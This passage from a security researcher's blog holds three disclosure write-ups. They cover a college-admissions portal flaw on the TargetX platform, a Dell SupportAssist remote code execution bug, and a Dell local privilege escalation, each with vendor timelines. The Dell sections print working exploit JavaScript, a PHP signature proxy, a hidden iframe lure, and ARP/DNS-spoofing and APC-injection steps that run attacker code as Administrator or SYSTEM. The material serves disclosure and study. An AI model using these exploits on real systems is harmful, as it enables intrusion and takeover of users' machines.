After digging through several javascript files and learning more about the platform, I found out that Salesforce had a user interface backend system. I decided to try to access it and so I tried a random URL: /apply/_ui/search/ui/aaaaa. This resulted in a page that looked like this:

Hacking College Admissions

It looked like a standard 404 page. What caught my eye was the search bar on the top right. I started playing around with the values and found out it supported basic wildcards. I typed my name and used an asterick to see if I could find anything.

Hacking College Admissions

Sorry for censoring, but the details included some sensitive details. It seemed as though I could access my own "Application Form" and contact. I was not able to access the application of any other students which gave a sigh of relief, but it soon turned out that just being able to access my own application was severe enough.

After clicking on my name in the People section, I saw that there was an application record assigned to me. I clicked on it and then it redirected me to a page with a significant amount of information.

Hacking College Admissions

Here's a generalized list of everything I was able to access:

General application information
Decision information (detailed list of different considered factors)
Decision dates
Financial Aid information
GPA
Enrollment information
Decision information (misc. options i.e to show decision or not)
Recommendations (able to view them)
SAT / ACT Scores
High school transcript
Perosnal statement
Application fee

Here's where it gets even worse, I can edit everything I just listed above. For example:

Hacking College Admissions

Don't worry, I didn't accept myself into any schools or make my SAT Scores a 1600.

Initial contact

After finding this vulnerability, I immediately reached out to WPI's security team the same day to let them know about the vulnerabilities I found. They were very receptive and within a day they applied their first "patch". Whenever I tried accessing the backend panel, I would see my screen flash for a quick second and then a 404 Message popped up.

Hacking College Admissions

The flash had me interested, upon reading the source code of the page, I found all the data still there! I was very confused and diff'd the source code with an older copy I had saved. This is the javascript blocked that got added:

if (typeof sfdcPage != 'undefined') {
    if (window.stop) {
        window.stop();
    } else {
        document.execCommand("Stop");
    }
    /*lil too much*/
    if (typeof SimpleDialog != 'undefined') {
        var sd = new SimpleDialog("Error" + Dialogs.getNextId(), false);
        sd.setTitle("Error");
        sd.createDialog();
        window.parent.sd = sd;
        sd.setContentInnerHTML("<p align='center'><img src='/img/msg_icons/error32.png' style='margin:0 5px;'/></p><p align='center'>404 Page not found.</p><p align='center'><br /></p>");
        sd.show();
    }
    document.title = "Error 404";
}

This gave me a good chuckle. What they were doing was stopping the page from loading and then replacing the HTML with a 404 error. I could just use NoScript, but I decided to create a simple userscript to disable their tiny "fix".

(function() {
    'use strict';

    if(document.body.innerHTML.includes("404 Page not found.")) {
        window.stop();
        const xhr = new XMLHttpRequest();
        xhr.open('GET', window.location.href);
        xhr.onload = () => {
            var modified_html = xhr.responseText
            .replace(/<script\b[\s\S]*?<\/script>/g, s => {
                if (s.includes("lil too much"))
                    return ""; // Return nothing for the script content
                return s;
            });
            document.open();
            document.write(modified_html);
            document.close();
        };
        xhr.send();
    }
})();

Basically, this userscript will re-request the page and remove any "404" script blocks then set the current page to the updated html. It worked great and bypassed their fix. As suspected, WPI only put a "band aid over the issue" to stop any immediate attacks. What I later learned when looking at some other schools was that TargetX themselves added the script under the name "TXPageStopper" - this wasn't just WPI's fix.

It's important to note that if you tried this today, sure the 404 page would be removed, but nothing is accessible. They've had this patch since January and after doing a real patch to fix the actual issue, they just never removed the 404 page stopper.

Remediation?

This is going to be a small section about my interactions with WPI after sending them the vulnerability details. I first found and reported this vulnerability back in January, specifically the third. WPI was very responsive (often replied within hours). I contacted them on February 14th again asking how the vulnerability patch was going and whether or not this was a vulnerability in only WPI or it was a vulnerability in TargetX too. Again within an hour, WPI responded saying that they have fixed the issues and that they had a "final meeting set up for the incident review". They said, "It was a combination of a TargetX vulnerability as well as tightening up some of our security settings".

I immediately (within 8 minutes) replied to their email asking for the TargetX side of the vulnerability to apply for a CVE. This is when things turned sour. Five days past and there was no reply. I sent a follow-up email to check in. I sent another follow up the next week and the week after that. Complete radio silence. By March 16th, I decided to send a final email letting them know that I had intended to publish about the vulnerability that week, but this time I CC'd the boss of the person I was in contact with.

Within a day, on a Sunday, the boss replied saying that they had not been aware that I was waiting on information. This is specifically what that email said:

We will reach out to TargetX tomorrow and determine and confirm the exact details of what we are able to release to you. I will be in touch in a day or two with additional information once we have talked with TargetX. We would prefer that you not release any blog posts until we can follow-up with TargetX. Thank you.

Of course if the vulnerability had not been completely patched yet, I did not want to bring any attention to it. I sent back an email appreciating their response and that I looked forward to their response.

A week past. I sent a follow up email asking on the status of things. No response. I sent another follow up the next week and this time I mentioned that I again was planning to publish. Radio silence.

It has been about a week since I sent that email and because I have had no response from them, I decided to publish given that they had said they had patched the vulnerability and because I could not extract any more data.

Other schools impacted

I named this post "Hacking College Admissions" because this vulnerability was not just in WPI. Besides WPI confirming this to me themselves, I found similar vulnerabilities in other schools that were using the TargetX platform.

To find other schools impacted, I found all of the subdomains of force.com and tried to find universities. I am sure I missed some schools, but this is a small list of the other schools affected.

Antioch University
Arcadia University
Averett University
Bellevue University
Berklee College of Music
Boston Architechtural College
Boston University
Brandman University
Cabrini University
California Baptist University
California School Of The Arts, San Gabriel Valley
Cardinal University
City Year
Clarion University of Pennsylvania
Columbia College
Concordia University, Irvine
Concordia University, Montreal
Concordia University, Oregon
Concordia University, Texas
Delaware County Community College
Dominican University
ESADE Barcelona
East Oregon University
Eastern University
Embry-Riddle Aeronautical University
Fashion Institute of Design & Merchandising
George Mason University
George Washington University
Grove City College
Harvard Kennedy School
Hood College
Hope College
Illinois Institute of Technology
International Technological University
Johnson & Wales University
Keene State College
Laguna College
Lebanon Valley College
Lehigh Carbon Community College
London School of Economics and Political Science
Mary Baldwin University
Master's University
Morovian College
Nazareth College
New York Institute of Technology
Oregon State University
Pepperdine University
Piedmont College
Plymouth State University
Regis College
Saint Mary's University of Minnesota
Simpson University
Skagit Valley College
Summer Discovery
Texas State Technical College
Townson University
USC Palmetto College
University of Akron
University of Arizona, Eller MBA
University of California, Davis
University of California, San Diego
University of California, Santa Barbara
University of Dayton
University of Houston
University of Maine
University of Michigan-Dearborn
University of Nevada, Reno
University of New Hampshire
University of New Haven
University of Texas, Dallas
University of Virginia
University of Washington
Universwity of Alabama, Birmingham
West Virginia University
Western Connecticut University
Western Kentucky University
Western Michigan University
Wisconsin Indianhead Technical College
Worcester Polytechnic Institute
Wright State University

There are some schools that appeared to be running on the same Salesforce platform, but on a custom domain which is probably why I missed schools.

Conclusion

It turns out, having lots of money isn't the only way to get into your dream college and yes, you can "Hack yourself into a school". The scary part about my findings was that at least WPI was vulnerable since they implemented the Salesforce system in 2012. Maybe students should be taking a better look at the systems around them, because all I can imagine is if someone found something like this and used it to cheat the system.

I hope you enjoyed the article and feel free to message me if you have any questions.

Remote Code Execution on most Dell computers

30 April 2019 at 12:52
Remote Code Execution on most Dell computers

What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is "What third-party software came with my PC?". In this article, I'll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to "proactively check the health of your system’s hardware and software" and which is "preinstalled on most of all new Dell devices".

Discovery

Back in September, I was in the market for a new laptop because my 7-year-old Macbook Pro just wasn't cutting it anymore. I was looking for an affordable laptop that had the performance I needed and I decided on Dell's G3 15 laptop. I decided to upgrade my laptop's 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell's support site, I was prompted with an interesting option.

Remote Code Execution on most Dell computers

"Detect PC"? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

Remote Code Execution on most Dell computers

A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn't installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

Installing it was a painless process with just a click to install button. In the shadows, the SupportAssist Installer created the SupportAssistAgent and the Dell Hardware Support service. These services corresponded to .NET binaries making it easy to reverse engineer what it did. After installing, I went back to the Dell website and decided to check what it could find.

Remote Code Execution on most Dell computers

I opened the Chrome Web Inspector and the Network tab then pressed the "Detect Drivers" button.

Remote Code Execution on most Dell computers

The website made requests to port 8884 on my local computer. Checking that port out on Process Hacker showed that the SupportAssistAgent service had a web server on that port. What Dell was doing is exposing a REST API of sorts in their service which would allow communication from the Dell website to do various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken which also provides when the signature expires. After pressing download drivers on the web side, this request was of particular interest:

POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Origin: https://www.dell.com
Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

The body:

[
    {
    "title":"Dell G3 3579 and 3779 System BIOS",
    "category":"BIOS",
    "name":"G3_3579_1.9.0.exe",
    "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
    "isSecure":false,
    "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
    "run":false,
    "restricted":false,
    "fileId":"198393521",
    "fileSize":"13 MB",
    "checkedStatus":false,
    "fileStatus":-99,
    "driverId":"4WW45",
    "path":"",
    "dupInstallReturnCode":"",
    "cssClass":"inactive-step",
    "isReboot":true,
    "DiableInstallNow":true,
    "$$hashKey":"object:175"
    }
]

It seemed like the web client could make direct requests to the SupportAssistAgent service to "download and manually install" a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on either port 8884, 8883, 8886, or port 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.

ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks for example making sure the request came from the local machine and various other checks. Later in this article, we’ll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.

An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

// Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
public static bool ValidateDomain(Uri request, Uri urlReferrer)
{
	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) &&request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http");
}

// Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
public static bool ValidateDomain(string domain)
{
	return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com");
}

The issue with the function above is the fact that it really isn’t a solid check and gives an
attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to
    find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.

When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell’s support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browsers console.

At first, the website tries to detect SupportAssist by looping through the aformentioned service ports and connecting to the Service Method “isalive”. What was interesting was that it was passing a “Signature” parameter and a “Expires” parameter. To find out more, I reversed the javascript side of the browser. Here’s what I found out:

  1. First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
  2. Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
  3. The SupportAssist client then responds when the right service port is reached, with a style like this:
{
	"isAlive": true,
	"clientVersion": "[CLIENT VERSION]",
	"requiredVersion": null,
	"success": true,
	"data": null,
	"localTime": [EPOCH TIME],
	"Exception": {
		"Code": null,
		"Message": null,
		"Type": null
	}
}
  1. Once the browser sees this, it continues with further requests using the now determined
    service port.

Some concerning factors I noticed while looking at different types of requests I could make is that I could get a very detailed description of every piece of hardware connected to my computer using the “getsysteminfo” route. Even through Cross Site Scripting, I was able to access this data, which is an issue because I could seriously fingerprint a system and find some sensitive information.

Here are the methods the agent exposes:

clientservice_getdevicedrivers - Grabs available updates.
diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
downloadservice_downloadfiles - Downloads a JSON array of files.
clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
clientservice_getservicetag - Grabs the service tag.
localclient_img - Connects to SignalR (Dell Hardware Support).
diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
diagnosticsservice_launchtool - Launches a diagnostic tool.
diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
downloadservice_createiso - Download an ISO.
clientservice_checkadminrights - Check if the Agent privileged.
diagnosticsservice_performinstallation - Update SupportAssist.
diagnosticsservice_rebootsystem - Reboot system.
clientservice_getdevices - Grab system devices.
downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
downloadservice_createbootableiso - Download bootable iso.
diagnosticsservice_isalive - Heartbeat check.
downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
clientservice_getscanresults - Gets driver scan results.
downloadservice_restartsystem - Restarts the system.

The one that caught my interest was downloadservice_downloadandautoinstall. This method would download a file from a specified URL and then run it. This method is ran by the browser when the user needs to install certain drivers that need to be installed automatically.

  1. After finding which drivers need updating, the browser makes a POST request to “http://127.0.0.1:[SERVICE PORT]/downloadservice/downloadandautoinstall?expires=[EXPIRES]&signature=[SIGNATURE]”.
  2. The browser sends a request with the following JSON structure:
[
	{
	"title":"DOWNLOAD TITLE",
	"category":"CATEGORY",
	"name":"FILENAME",
	"location":"FILE URL",
	"isSecure":false,
	"fileUniqueId":"RANDOMUUID",
	"run":true,
	"installOrder":2,
	"restricted":false,
	"fileStatus":-99,
	"driverId":"DRIVER ID",
	"dupInstallReturnCode":0,
	"cssClass":"inactive-step",
	"isReboot":false,
	"scanPNPId":"PNP ID",
	"$$hashKey":"object:210"
	}
] 
  1. After doing the basic integrity checks we discussed before, ClientServiceHandler.ProcessRequest sends the ServiceMethod and the parameters we passed to ClientServiceHandler.HandlePost.
  2. ClientServiceHandler.HandlePost first puts all parameters into a nice array, then calls ServiceMethodHelper.CallServiceMethod.
  3. ServiceMethodHelper.CallServiceMethod acts as a dispatch function, and calls the function given the ServiceMethod. For us, this is the “downloadandautoinstall” method:
if (service_Method == "downloadservice_downloadandautoinstall")
{
	string files5 = (arguments != null && arguments.Length != 0 && arguments[0] != null) ? arguments[0].ToString() : string.Empty;
	result = DownloadServiceLogic.DownloadAndAutoInstall(files5, false);
} 

Which calls DownloadServiceLogic.DownloadAutoInstall and provides the files we sent in the JSON payload.
6. DownloadServiceLogic.DownloadAutoInstall acts as a wrapper (i.e handling exceptions) for DownloadServiceLogic._HandleJson.
7. DownloadServiceLogic._HandleJson deserializes the JSON payload containing the list of files to download, and does the following integrity checks:

foreach (File file in list)
{
	bool flag2 = file.Location.ToLower().StartsWith("http://");
	if (flag2)
	{
		file.Location = file.Location.Replace("http://", "https://");
	}
	bool flag3 = file != null && !string.IsNullOrEmpty(file.Location) && !SecurityHelper.CheckDomain(file.Location);
	if (flag3)
	{
		DSDLogger.Instance.Error(DownloadServiceLogic.Logger, "InvalidFileException being thrown in _HandleJson method");
		throw new InvalidFileException();
	}
}
DownloadHandler.Instance.RegisterDownloadRequest(CreateIso, Bootable, Install, ManualInstall, list);

The above code loops through every file, and checks if the file URL we provided doesn’t start with http:// (if it does, replace it with https://), and checks if the URL matches a list of Dell’s download servers (not all subdomains):

public static bool CheckDomain(string fileLocation)
{
	List<string> list = new List<string>
	{
		"ftp.dell.com",
		"downloads.dell.com",
		"ausgesd4f1.aus.amer.dell.com"
	};
	
	return list.Contains(new Uri(fileLocation.ToLower()).Host);
} 
  1. Finally, if all these checks pass, the files get sent to DownloadHandler.RegisterDownloadRequest at which point the SupportAssist downloads and runs the files as Administrator.

This is enough information we need to start writing an exploit.

Exploitation

The first issue we face is making requests to the SupportAssist client. Assume we are in the context of a Dell subdomain, we’ll get into how exactly we do this further in this section. I decided to mimic the browser and make requests using javascript.

First things first, we need to find the service port. We can do this by polling through the predefined service ports, and making a request to “/clientservice/isalive”. The issue is that we need to also provide a signature. To get the signature that we pass to isalive, we can make a request to “https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken”.

This isn’t as straight-forwards as it might seem. The “Access-Control-Allow-Origin” of the signature url is set to “https://www.dell.com”. This is a problem, because we’re in the context of a subdomain, probably not https. How do we get past this barrier? We make the request from our own servers!

The signatures that are returned from “getdsdtoken” are applicable to all machines, and not unique. I made a small PHP script that will grab the signatures:

<?php
header('Access-Control-Allow-Origin: *');
echo file_get_contents('https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken');
?> 

The header call allows anyone to make a request to this PHP file, and we just echo the signatures, acting as a proxy to the “getdsdtoken” route. The “getdsdtoken” route returns JSON with signatures and an expire time. We can just use JSON.parse on the results to place the signatures into a javascript object.

Now that we have the signature and expire time, we can start making requests. I made a small function that loops through each server port, and if we reach it, we set the server_port variable (global) to the port that responded:

function FindServer() {
	ports.forEach(function(port) {
		var is_alive_url = "http://127.0.0.1:" + port + "/clientservice/isalive/?expires=" + signatures.Expires + "&signature=" + signatures.IsaliveToken;
		var response = SendAsyncRequest(is_alive_url, function(){server_port = port;});
	});
} 

After we have found the server, we can send our payload. This was the hardest part, we have some serious obstacles before “downloadandautoinstall” executes our payload.

Starting with the hardest issue, the SupportAssist client has a hard whitelist on file locations. Specifically, its host must be either "ftp.dell.com", "downloads.dell.com", or "ausgesd4f1.aus.amer.dell.com". I almost gave up at this point, because I couldn’t find an open redirect vulnerability on any of the sites. Then it hit me, we can do a man-in-the-middle attack.

If we could provide the SupportAssist client with a http:// URL, we could easily intercept and change the response! This somewhat solves the hardest challenge.

The second obstacle was designed specifically to counter my solution to the first obstacle. If we look back to the steps I outlined, if the file URL starts with http://, it will be replaced by https://. This is an issue, because we can’t really intercept and change the contents of a proper https connection. The key bypass to this mitigation was in this sentence: “if the URL starts with http://, it will be replaced by https://”. See, the thing was, if the URL string did not start with http://, even if there was http:// somewhere else in the string, it wouldn’t replace it. Getting a URL to work was tricky, but I eventually came up with “ http://downloads.dell.com/abcdefg” (the space is intentional). When you ran the string through the starts with check, it would return false, because the string starts with “ “, thus leaving the “http://” alone.

I made a function that automated sending the payload:

function SendRCEPayload() {
	var auto_install_url = "http://127.0.0.1:" + server_port + "/downloadservice/downloadandautoinstall?expires=" + signatures.Expires + "&signature=" + signatures.DownloadAndAutoInstallToken;

	var xmlhttp = new XMLHttpRequest();
	xmlhttp.open("POST", auto_install_url, true);

	var files = [];
	
	files.push({
	"title": "SupportAssist RCE",
	"category": "Serial ATA",
	"name": "calc.EXE",
	"location": " http://downloads.dell.com/calc.EXE", // those spaces are KEY
	"isSecure": false,
	"fileUniqueId": guid(),
	"run": true,
	"installOrder": 2,
	"restricted": false,
	"fileStatus": -99,
	"driverId": "FXGNY",
	"dupInstallReturnCode": 0,
	"cssClass": "inactive-step",
	"isReboot": false,
	"scanPNPId": "PCI\\VEN_8086&DEV_282A&SUBSYS_08851028&REV_10",
	"$$hashKey": "object:210"});
	
	xmlhttp.send(JSON.stringify(files)); 
}

Next up was the attack from the local network. Here are the steps I take in the external portion of my proof of concept (attacker's machine):

  1. Grab the interface IP address for the specified interface.
  2. Start the mock web server and provide it with the filename of the payload we want to send. The web server checks if the Host header is downloads.dell.com and if so sends the binary payload. If the request Host has dell.com in it and is not the downloads domain, it sends the javascript payload which we mentioned earlier.
  3. To ARP Spoof the victim, we first enable ip forwarding then send an ARP packet to the victim telling it that we're the router and an ARP packet to the router telling it that we're the victim machine. We repeat these packets every few seconds for the duration of our exploit. On exit, we will send the original mac addresses to the victim and router.
  4. Finally, we DNS Spoof by using iptables to redirect DNS packets to a netfilter queue. We listen to this netfilter queue and check if the requested DNS name is our target URL. If so, we send a fake DNS packet back indicating that our machine is the true IP address behind that URL.
  5. When the victim visits our subdomain (either directly via url or indirectly by an iframe), we send it the malicious javascript payload which finds the service port for the agent, grabs the signature from the php file we created earlier, then sends the RCE payload. When the RCE payload is processed by the agent, it will make a request to downloads.dell.com which is when we return the binary payload.

You can read Dell's advisory here.

Demo

Here's a small demo video showcasing the vulnerability. You can download the source code of the proof of concept here.

The source code of the dellrce.html file featured in the video is:

<h1>CVE-2019-3719</h1>
<h1>Nothing suspicious here... move along...</h1>
<iframe src="http://www.dellrce.dell.com" style="width: 0; height: 0; border: 0; border: none; position: absolute;"></iframe>

Timeline

10/26/2018 - Initial write up sent to Dell.

10/29/2018 - Initial response from Dell.

11/22/2018 - Dell has confirmed the vulnerability.

11/29/2018 - Dell scheduled a "tentative" fix to be released in Q1 2019.

01/28/2019 - Disclosure date extended to March.

03/13/2019 - Dell is still fixing the vulnerability and has scheduled disclosure for the end of April.

04/18/2019 - Vulnerability disclosed as an advisory.

Local Privilege Escalation on Dell machines running Windows

19 July 2019 at 14:30
Local Privilege Escalation on Dell machines running Windows

In May, I published a blog post detailing a Remote Code Execution vulnerability in Dell SupportAssist. Since then, my research has continued and I have been finding more and more vulnerabilities. I strongly suggest that you read my previous blog post, not only because it provides a solid conceptual understanding of Dell SupportAssist, but because it's a very interesting bug.

This blog post will cover my research into a Local Privilege Escalation vulnerability in Dell SupportAssist. Dell SupportAssist is advertised to "proactively check the health of your system’s hardware and software". Unfortunately, Dell SupportAsssist comes pre-installed on most of all new Dell machines running Windows. If you're on Windows, never heard of this software, and have a Dell machine - chances are you have it installed.

Discovery

Amusingly enough, this bug was discovered while I was doing my write-up for the previous remote code execution vulnerability. For switching to previous versions of Dell SupportAssist, my method is to stop the service, terminate the process, replace the binary files with an older version, and finally start the service. Typically, I do this through a neat tool called Process Hacker, which is a vamped up version of the built-in Windows Task Manager. When I started the Dell SupportAssist agent, I saw this strange child process.

Local Privilege Escalation on Dell machines running Windows

I had never noticed this process before and instinctively I opened the process to see if I could find more information about it.

Local Privilege Escalation on Dell machines running Windows

We straight away can tell that it's a .NET Application given the ".NET assemblies" and ".NET performance" tabs are populated. Browsing various sections of the process told us more about it. For example, the "Token" tab told us that this was an unelevated process running as the current user.

Local Privilege Escalation on Dell machines running Windows

While scrolling through the "Handles" tab, something popped out at me.

Local Privilege Escalation on Dell machines running Windows

For those who haven't used Process Hacker in the past, the cyan color indicates that a handle is marked as inheritable. There are plenty of processes that have inheritable handles, but the key part about this handle was the process name it was associated with. This was a THREAD handle to SupportAssistAgent.exe, not SupportAssistAppWire.exe. SupportAssistAgent.exe was the parent SYSTEM process that created SupportAssistAppWire.exe - a process running in an unelevated context. This wasn't that big of a deal either, a SYSTEM process may share a THREAD handle to a child process - even if it's unelevated, but with restrictive permissions such as THREAD_SYNCHRONIZE. What I saw next is where the problem was evident.

Local Privilege Escalation on Dell machines running Windows

This was no restricted THREAD handle that only allowed for basic operations, this was straight up a FULL CONTROL thread handle to SupportAssistAgent.exe. Let me try to put this in perspective. An unelevated process has a FULL CONTROL handle to a thread in a process running as SYSTEM. See the issue?

Let's see what causes this and how we can exploit it.

Reversing

Every day, Dell SupportAssist runs a "Daily Workflow Task" that performs several actions typically to execute routine checks such as seeing if there is a new notification that needs to be displayed to the user. Specifically, the Daily Workflow Task will:

  • Attempt to query the latest status of any cases you have open
  • Clean up the local database of unneeded entries
  • Clean up log files older than 30 days
  • Clean up reports older than 5 days (primarily logs sent to Dell)
  • Clean up analytic data
  • Registers your device with Dell
  • Upload all your log files if it's been 30-45 days
  • Upload any past failed upload attempts
  • If it's been 14 days since the Agent was first started, issue an "Optimize System" notification.

The important thing to remember is that all of these checks were performed on a daily basis. For us, the last check is most relevant, and it's why Dell users will receive this "Optimize System" notification constantly.

Local Privilege Escalation on Dell machines running Windows

If you haven't run the PC Doctor optimization scan for over 14 days, you'll see this notification every day, how nice. After determining a notification should be created, the method OptimizeSystemTakeOverNotification will call the PushNotification method to issue an "Optimize System" notification.

For most versions of Windows 10, PushNotification will call a method called LaunchUwpApp. LaunchUwpApp takes the following steps:

  1. Grab the active console session ID. This value represents the session ID for the user that is currently logged in.
  2. For every process named "explorer", it will check if its session ID matches the active console session ID.
  3. If the explorer process has the same session ID, the agent will duplicate the token of the process.
  4. Finally, if the duplicated token is valid, the Agent will start a child process named SupportAssistAppWire.exe, with InheritHandles set to true.
  5. SupportAssistAppWire.exe will then create the notification.

The flaw in the code can be seen in the call to CreateProcessAsUser.

Local Privilege Escalation on Dell machines running Windows

As we saw in the Discovery section of this post, SupportAssistAgent.exe, an elevated process running as SYSTEM starts a child process using the unelevated explorer token and sets InheritHandles to true. This means that all inheritable handles that the Agent has will be inherited by the child process. It turns out that the thread handle for the service control handler for the Agent is marked as inheritable.

Exploiting

Now that we have a way of getting a FULL CONTROL thread handle to a SYSTEM process, how do we exploit it? Well, the simplest way I thought of was to call LoadLibrary to load our module. In order to do this, we need to get past a few requirements.

  1. We need to be able to predict the address of a buffer that contains a file path that we can access. For example, if we had a buffer with a predictable address that contained "C:\somepath\etc...", we could write a DLL file to that path and pass LoadLibrary the buffer address.
  2. We need to find a way to use QueueUserApc to call LoadLibrary. This means that we need to have the thread become alertable.

I thought of various ways I could have my string loaded into the memory of the Agent, but the difficult part was finding a way to predict the address of the buffer. Then I had an idea. Does LoadLibrary accept files that don’t have a binary extension?

Local Privilege Escalation on Dell machines running Windows

It appeared so! This meant that the file path in a buffer only needed to be a file we can access; not necessarily have a binary extension such as .exe or .dll. To find a buffer that was already in memory, I opted to use Process Hacker which includes a Strings utility with built-in filtering. I scanned for strings in an Image that contained C:\. The first hit I got shocked me.

Local Privilege Escalation on Dell machines running Windows

Look at the address of the first string, 0x180163f88... was a module running without ASLR? Checking the modules list for the Agent, I saw something pretty scary.

Local Privilege Escalation on Dell machines running Windows

A module named sqlite3.dll had been loaded with a base address of 0x180000000. Checking the module in CFF Explorer confirmed my findings.

Local Privilege Escalation on Dell machines running Windows

The DLL was built without the IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE characteristic, meaning that ASLR was disabled for it. Somehow this got into the final release build of a piece of software deployed on millions of endpoints. This weakness makes our lives significantly easier because the buffer contained the path c:\dev\sqlite\core\sqlite3.pdb, a file path we could access!

We already determined that the extension makes no difference meaning that if I write a DLL to c:\dev\sqlite\core\sqlite3.pdb and pass the buffer pointer to LoadLibrary, the module we wrote to c:\dev\sqlite\core\sqlite3.pdb should be loaded.

Now that we got the first problem sorted, the next part of our exploitation is to get the thread to be alertable. What I found in my testing is that this thread was the service control handler for the Agent. This meant that the thread was in a Wait Non-Alertable state because it was waiting for a service control signal to come through.

Local Privilege Escalation on Dell machines running Windows

Checking the service permissions for the Agent, I found that the INTERACTIVE group had some permissions. Luckily, INTERACTIVE includes unprivileged users, meaning that the permissions applied directly to us.

Local Privilege Escalation on Dell machines running Windows

Both Interrogate and User-defined control sends a service signal to the thread, meaning we can get out of the Wait state. Since the thread continued execution after receiving a service control signal, we can use SetThreadContext and set the RIP pointer to a target function. The function NtTestAlert was perfect for this situation because it immediately makes the thread alertable and executes our APCs.

To summarize the exploitation process:

  1. The stager monitors for the child SupportAssistAppWire.exe process.
  2. The stager writes a malicious APC DLL to C:\dev\sqlite\core\sqlite3.pdb.
  3. Once the child process is created, the stager injects our malicious DLL into the process.
  4. The DLL finds the leaked thread handle using a brute-force method (NtQuerySystemInformation works just as well).
  5. The DLL sets the RIP register of the Agent's thread to NtTestAlert.
  6. The DLL queues an APC passing in LoadLibraryA for the user routine and 0x180163f88 (buffer pointer) as the first argument.
  7. The DLL issues an INTERROGATE service control to the service.
  8. The Agent then goes to NtTestAlert triggering the APC which causes the APC DLL to be loaded.
  9. The APC DLL starts our malicious binary (for the PoC it's command prompt) while in the context of a SYSTEM process, causing local privilege escalation.

Dell's advisory can be accessed here.

Demo

Privacy concerns

After spending a long time reversing the Dell SupportAssist agent, I've come across a lot of practices that are in my opinion very questionable. I'll leave it up to you, the reader, to decide what you consider acceptable.

  1. On most exceptions, the agent will send the exception detail along with your service tag to Dell's servers.
  2. Whenever a file is executed for Download and Auto install, Dell will send the file name, your service tag, the status of the installer, and the logs for that install to their servers.
  3. Whenever you scan for driver updates, any updates found will be sent to Dell’s servers alongside your service tag.
  4. Whenever Dell retrieves scan results about your bios, pnp drivers, installed programs, and operating system information, all of it is uploaded to Dell servers.
  5. Every week your entire log directory is uploaded to Dell servers (yes, Dell logs by default).
  6. Every two weeks, Dell uploads a “heartbeat” including your device details, alerts, software scans, and much more.

You can disable some of this, but it’s enabled by default. Think about the millions of endpoints running Dell SupportAssist…

Timeline

